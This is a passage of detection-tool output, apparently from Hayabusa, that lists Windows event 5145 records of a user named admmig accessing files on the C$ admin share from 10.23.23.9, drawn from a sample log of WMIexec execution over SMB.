10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap : IP Address: 